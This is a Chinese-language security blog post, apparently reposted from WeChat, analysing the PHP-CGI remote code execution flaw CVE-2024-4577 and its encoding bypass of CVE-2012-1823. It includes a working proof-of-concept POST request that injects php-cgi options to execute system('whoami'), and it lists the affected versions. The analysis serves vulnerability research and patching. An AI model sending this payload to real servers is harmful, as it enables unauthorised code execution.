实战-最新PHP-RCE+详细分析(CVE-2024-4577)

admin 2024年6月8日19:25:13评论55 views字数 1178阅读3分55秒阅读模式
前言

最新PHP-RCE详细分析(CVE-2024-4577)

是一种对CVE-2012-1823的一种绕过

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

前身
最新的php rce是建立在CVE-2012-1823基础上的一次编码绕过,而CVE-2012-1823的成因简单来说就是在CGI模式下,用户请求的querystring被作为了php-cgi的参数传递给php-cgi.exe成功解析执行,造成RCE。
php-cgi.exe接收的参数-c 指定php.ini文件的位置-n 不要加载php.ini文件-d 指定配置项-b 启动fastcgi进程-s 显示文件源码-T 执行指定次该文件-h和-? 显示帮助-s查看元件源码

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

框架攻击
urlcode编码中%3D为=,%3A为:  

-d allow_url_include=on

控制允许在include、include_once、require、require_once等函数中使用URL作为文件名,可以远程url加载执行php代码

-d auto_prepend_file=php://input

php://input流通常用于读取POST数据,而-d auto_prepend_file则指定了包含的php脚本为POST输入

所以使用以下payload就使得能够允许文件包含,而文件包含是读入的POST数据流作为脚本.
poc如下:
POST /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1Host: xxxxx.comContent-Length: 25<?php system("whoami");?>

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

后面官方修补的补丁中也就是把”-”这个字符给匹配过滤了
而最新版的RCE之所以只会影响繁体中文、简体中文、日文这三个语言版本的windows系统,
就是因为有大神找到了-的编码绕过方式,在我们带入参数拼接前宽字节会被转换,0x00ad显然不是一个完整的字节,而是一部分字节。
而在中文GBK编码中正好可以找到一个-来对其进行%ad编码从而绕过

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

实战截图

实战-最新PHP-RCE+详细分析(CVE-2024-4577)

总结
1.具有简体中文、繁体中文、日文的Windows系统,支持bestfit936 GBK编码
2.开发是在CGI(单PHP)环境中,利用条件很苛刻
3.PHP局限在一定的版本
提醒
phpstudy集成中没漏洞版本。
漏洞版本:

        PHP 8.3 < 8.3.8              

        PHP 8.2 < 8.2.20          

        PHP 8.1 < 8.1.29

承接红蓝对抗,安全众测,安全培训,SRC培训,代码审计,渗透测试,应急响应,免杀等.

(安全可靠,排名稳定,战绩可查.)

原文始发于微信公众号(极梦C):实战-最新PHP-RCE+详细分析(CVE-2024-4577)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日19:25:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战-最新PHP-RCE+详细分析(CVE-2024-4577)https://cn-sec.com/archives/2831144.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息